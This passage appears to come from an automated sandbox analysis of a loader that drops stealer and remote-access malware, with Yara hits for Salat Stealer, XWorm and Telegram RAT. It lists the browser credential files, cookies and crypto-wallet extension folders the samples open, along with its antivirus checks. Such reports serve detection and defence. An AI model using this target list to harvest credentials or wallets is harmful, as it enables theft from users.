                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AmountExtractionHeuristicRegexes VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Users\user\AppData\Roaming\svhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: svhost.exe, 00000003.00000002.2146294254.000000001BF55000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2152581567.000000001CA50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2152581567.000000001CA61000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2146294254.000000001BFAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Salat Stealer
                        Source: Yara matchFile source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.939032080.000000000167D000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2129024902.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1079600336.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.943416104.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7956, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Yara detected XWorm
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: KoaguarLoader.exe, type: SAMPLE
                        Source: Yara matchFile source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type avx512finvaliduintptrChanDir using , type= Value>Convert::ffff:answersExpiresSubjectCONOUT$charsetInstAltInstNopalt -> nop -> any -> (empty)Not-ECTOPTIONSoptionsalt-svcpurpose%v: %#x2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9%s (%s)%s %#vquic ivquic hpquic kugo_funcgo_stepos/execruntime#interngo_opengo_readgo_syncgo_lockamxtileamxint8amxbf16osxsaveavxifmaavxvnnii32.eqzi64.eqzi32.clzi32.ctzi32.addi32.subi32.muli32.andi32.xori32.shli64.clzi64.ctzi64.addi64.subi64.muli64.andi64.xori64.shlf32.absf32.negf32.addf32.subf32.mulf32.divf32.minf32.maxf64.absf64.negf64.addf64.subf64.mulf64.divf64.minf64.maxv128.orfuncrefelementsuccessBrTableStore16Store32NearestRefFuncV128AddV128SubV128AndV128NotV128XorV128ShlV128ShrV128CmpV128MulV128DivV128NegV128AbsV128MinV128MaxV128Dot.returnWSAPolltelegramBytecoinbytecoinEthereumElectrumMyMoneroCoinbaseCrocobitMetamaskStarcoinWaterfoxK-MeleonCyberfoxBlackHawChromiumElementsCatalinaQIP Surfbinpath=${TEMP}/chunking-nostatsCapsLockPageDowncheckDOHatoi: %s$appdata
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: : ` %#xPUT103503*/*302403421425getackanyenvneti32i64f32f64nopu32u64s32s64EqzAddSubMulClzCtzDivRemAndXorShlShrAbsNegMinMaxBUG:%dstrJaxxCoreEverMathNamiTronUranEdgesent.zip-q:vtrue%s%cLAltRAltLWinRWinAppsDownLeftHomeNum0Num1Num2Num3Num4Num5Num6Num7Num8Num9Num*Num+Num-Num.Num/bibawinv.exedataOS: IP: .jpg.txtTRUEopen/PIDwmiccallPATH:443readnullbooljson'\''eEpPRGBAGrayCMYKjpeg
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134971267.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletG
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134884260.0000000001429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:sse41sse42ssse3int16int32int64uint8slicekind= (at ClassRetryparseutf-8%s*%dtext/bad nmatchrune 0-RTT1-RTTclear15:04tableblockbr_if%d Ki%d Mi%d Gi%d TilabelLoad8StoreFloorTrunc%s %d%s %s%s.%s%s %fI8x16I16x8I32x4I64x2F32x4F64x2stdin%#x: Attr(ArmoryExodusGuardaBitappCoin98FewchaFinnieIconexKaikasOxygenPontemSaturnSolletWombatXMR.PTXinPayChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsc.execreatedeletestart $temp\chunk!audio=video=LShiftRShiftPageUpInsertDelete[AFK] 0.22.0 (x86)acceptAnswer GB
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type avx512finvaliduintptrChanDir using , type= Value>Convert::ffff:answersExpiresSubjectCONOUT$charsetInstAltInstNopalt -> nop -> any -> (empty)Not-ECTOPTIONSoptionsalt-svcpurpose%v: %#x2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9%s (%s)%s %#vquic ivquic hpquic kugo_funcgo_stepos/execruntime#interngo_opengo_readgo_syncgo_lockamxtileamxint8amxbf16osxsaveavxifmaavxvnnii32.eqzi64.eqzi32.clzi32.ctzi32.addi32.subi32.muli32.andi32.xori32.shli64.clzi64.ctzi64.addi64.subi64.muli64.andi64.xori64.shlf32.absf32.negf32.addf32.subf32.mulf32.divf32.minf32.maxf64.absf64.negf64.addf64.subf64.mulf64.divf64.minf64.maxv128.orfuncrefelementsuccessBrTableStore16Store32NearestRefFuncV128AddV128SubV128AndV128NotV128XorV128ShlV128ShrV128CmpV128MulV128DivV128NegV128AbsV128MinV128MaxV128Dot.returnWSAPolltelegramBytecoinbytecoinEthereumElectrumMyMoneroCoinbaseCrocobitMetamaskStarcoinWaterfoxK-MeleonCyberfoxBlackHawChromiumElementsCatalinaQIP Surfbinpath=${TEMP}/chunking-nostatsCapsLockPageDowncheckDOHatoi: %s$appdata
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134971267.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: go_full_pathnameavx512vpclmulqdqi64.extend_i32_si64.extend_i32_uf32.convert_i64uv128.load8_splatv128.load32_zerov128.load64_zerov128.load16_lanev128.load32_lanev128.load64_lanev128.store8_lanei32.atomic.storei64.atomic.store%s invalid as %vinvalid drop: %vdecode int33: %wkind != func: %sresult too largeF32DemoteFromF64V128FloatPromoteargs invalid: %wread element: %wunaligned atomictoo many waitersWTSQueryUserTokenSetWindowsHookExAGetKeyboardLayoutD877F783D5D3EF8CsA7FDF864FBC10B77sF8806DD0C461824FsC2B05980D9127787s0CA814316818D8F6sCoSetProxyBlanketEthereum\keystoreinvalid file path\Telegram DesktopBrowsers\Cookies_taskkill /F /PID Write after Closedecryption failedhandshake failureillegal parametermissing extensionunrecognized namereflect.Value.Intin string literal0123456789ABCDEFX0123456789abcdefxillegal hex digitcan't scan type: invalid stream IDTransfer-EncodingHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIf-Modified-Sinceframe_ping_lengthtruncated headersif-modified-sincetransfer-encodingx-forwarded-protoX-Idempotency-KeyMoved PermanentlyFailed DependencyToo Many Requests
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
